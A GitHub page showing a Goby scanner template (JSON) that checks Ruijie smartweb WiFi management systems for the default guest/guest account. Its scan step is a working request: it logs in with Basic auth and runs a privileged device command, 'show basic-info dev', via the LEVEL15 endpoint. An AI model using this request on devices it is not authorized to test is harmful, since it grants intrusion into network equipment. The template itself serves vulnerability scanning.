forked from k3vi-07/goby-exp
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathRuijie_smartweb_weak_password.json
55 lines (55 loc) · 2.22 KB
/
Ruijie_smartweb_weak_password.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
{
"Name": "Ruijie smartweb weak password",
"Level": "1",
"Tags": [
"弱口令"
],
"GobyQuery": "app=\"Ruijie-WiFi\" && body=\"无线smartWeb--登录页面\"",
"Description": "Ruijie smartweb management system opens the guest account vulnerability by default , and the attacker can log in to the background through the vulnerability to further attack (guest/guest)",
"Product": "Ruijie smartweb",
"Homepage": "http://www.ruijie.com.cn/",
"Author": "PeiQi",
"Impact": "<p>The attacker can log in to the background for further attack<br></p>",
"Recommandation": "<p>undefined</p>",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/WEB_VMS/LEVEL15/",
"follow_redirect": false,
"header": {
"Authorization": "Basic Z3Vlc3Q6Z3Vlc3Q="
},
"data_type": "text",
"data": "command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant."
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "Level was: LEVEL15",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-04-04 11:26:02",
"GobyVersion": "1.8.255"
}